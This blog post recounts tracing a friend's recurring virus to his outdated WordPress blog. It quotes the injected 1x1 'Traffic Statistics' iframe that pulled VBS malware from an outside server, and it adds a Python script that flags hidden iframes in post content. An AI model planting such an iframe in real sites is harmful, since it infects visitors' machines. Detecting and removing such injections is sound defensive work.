I was at a friend's home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus. I took a look and thought I was able to remove it, but he said that the next day it came back.
Ultimately he ended up having a local computer repair person come out, who cleaned up his system in a couple of hours, and the problem went away. But today we talked by phone, and he told me he got the warning again when he viewed his own blog.
I took a look at his blog and here’s what I saw -
Interesting! I recognized the IP address from the file that I couldn’t seem to get rid of while I was visiting, so now we had our culprit. We knew where his virus came from… it came from his own WordPress blog!
At that point I did a little bit of research, and found a post on the WordPress support forum talking about this very issue, where it seemed that someone had inserted this code into one of someone else’s old posts.
<!-- Traffic Statistics --> <iframe height="1" width="1" frameBorder="0" src="http://www.wp-stats-XXXphp.info/iframe/wp-stats.XXXphp"></iframe><!-- End Traffic Statistics -->
At that point it was a matter of picking through all of his posts manually, and viewing the HTML code of each one, before finding and deleting it. Of course, in his case, it was found in 8 different posts! It was coming from http://18.104.22.168/iframe/wp-stats.php and was a VBS Malware-gen.
Luckily he’s an infrequent poster, but can you imagine how difficult this may have been if there were multiple users posting every day?
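The manual search described above can be scripted. The following is an added example, not part of the original cleanup: it parses each post body and reports iframes that are sized or styled so a visitor never sees them. The sample rows, host names and function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample rows (post_id, post_content); hosts are placeholders.
SAMPLE_POSTS = [
    (101, '<p>Trip video</p><iframe width="560" height="315" '
          'src="https://video.example.com/embed/abc"></iframe>'),
    (102, '<p>Old post</p><!-- Traffic Statistics --> <iframe height="1" '
          'width="1" frameBorder="0" '
          'src="http://stats.example.invalid/iframe/wp-stats.php"></iframe>'
          '<!-- End Traffic Statistics -->'),
    (103, '<p>No embeds here.</p>'),
    (104, '<iframe style="display: none" src="http://203.0.113.7/x.php"></iframe>'),
]

class IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # the parser lowercases tag and attribute names
            self.frames.append({k: (v or "") for k, v in attrs})

def is_tiny(value):
    """True for dimensions such as "0", "1" or "1px"."""
    v = value.strip().lower().replace("px", "")
    return v.isdigit() and int(v) <= 2

def is_hidden(frame):
    style = frame.get("style", "").replace(" ", "").lower()
    return (is_tiny(frame.get("width", "")) or is_tiny(frame.get("height", ""))
            or "display:none" in style or "visibility:hidden" in style)

def find_hidden_iframes(posts):
    """Return (post_id, host, src) for each iframe a visitor would not see."""
    hits = []
    for post_id, content in posts:
        finder = IframeFinder()
        finder.feed(content)
        for frame in finder.frames:
            if is_hidden(frame):
                src = frame.get("src", "")
                hits.append((post_id, urlparse(src).hostname or "", src))
    return hits

if __name__ == "__main__":
    for post_id, host, src in find_hidden_iframes(SAMPLE_POSTS):
        print(f"post {post_id}: hidden iframe -> {host} ({src})")
```

Feeding it the post IDs and bodies from a database export lists every affected post in one pass, and grouping the hits by host shows whether they all point at the same server.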
The moral of the story? Moderate your new users, use a secure password, keep your WordPress current (his was not) and watch out for strange e-mail addresses signing up as new users!